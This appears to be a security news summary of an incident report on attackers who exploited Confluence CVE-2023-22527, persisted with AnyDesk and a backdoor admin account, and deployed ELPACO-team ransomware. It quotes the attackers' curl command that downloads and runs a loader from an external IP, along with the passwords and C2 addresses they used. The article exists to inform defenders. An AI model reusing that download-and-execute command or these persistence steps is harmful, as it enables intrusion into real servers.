Cybersecurity researchers have uncovered a targeted attack campaign exploiting a known vulnerability in Atlassian Confluence servers to gain unauthorized access and deploy ransomware.
The attackers exploited CVE-2023-22527, a template injection flaw, to achieve remote code execution (RCE) on unpatched servers. The initial compromise occurred in June 2024, but the ransomware was deployed approximately 62 hours later, showing a patient and methodical approach.
Initial Access Through Confluence Vulnerability
After exploiting the vulnerability, attackers executed arbitrary commands on the system. They immediately deployed a Metasploit payload, established command and control (C2) communication, and installed AnyDesk for persistent access.
The following command was used during the attack:
cmd.exe /c "curl -sko %%TEMP%%\HAHLGiDDb.exe https://91.191.209.46:8080/YlDRANysdqsFrhht5dDNDw & start /B %%TEMP%%\HAHLGiDDb.exe"This downloaded and executed a loader, which connected to a remote C2 server. The loader used only basic Windows APIs (VirtualAlloc and ExitProcess), relying on obfuscation to resolve functions dynamically—a common trait in Metasploit payloads.
Privilege Escalation and Credential Theft
Once inside the network, attackers escalated privileges and used tools like Mimikatz to steal credentials. They enabled Remote Desktop Protocol (RDP) and moved laterally before deploying ELPACO-team ransomware, a variant of Mimic ransomware.
The DFIR Report analysis found that attackers used repeatable methods, suggesting the use of automation or predefined attack playbooks.
Persistent Access with AnyDesk and New Admin Accounts
The attackers installed AnyDesk.exe in the Confluence installation directory and configured it for unattended access with the password:
P@ssword1They executed the following command to configure the connection:
C:\Windows\system32\cmd.exe /S /D /c "echo P@ssword1"To further ensure access, they created a local admin account named noname with the password:
Slepoy_123This was done via a batch file using WMIC commands, and the account was configured so the password would never expire. Logs showed the account was created three times, indicating a systematic persistence strategy.
RDP Enablement and Registry Changes
To ensure access even if the vulnerability was later patched, the attackers enabled RDP by editing Windows registry values and modifying firewall rules. These changes bypassed standard security configurations and allowed remote access at multiple stages of the intrusion.
Attack Infrastructure and Indicators
The IP address 45.227.254.124 was used both for initial scans and later for hosting AnyDesk, indicating a preplanned infrastructure. Traffic logs confirmed the use of this IP throughout various phases of the attack.
Conclusion
This campaign shows how attackers combine known vulnerabilities with commercial tools like AnyDesk to carry out stealthy and persistent intrusions. Security teams are advised to patch Confluence servers, monitor for unauthorized admin account creation, and audit remote access tools on internal systems.
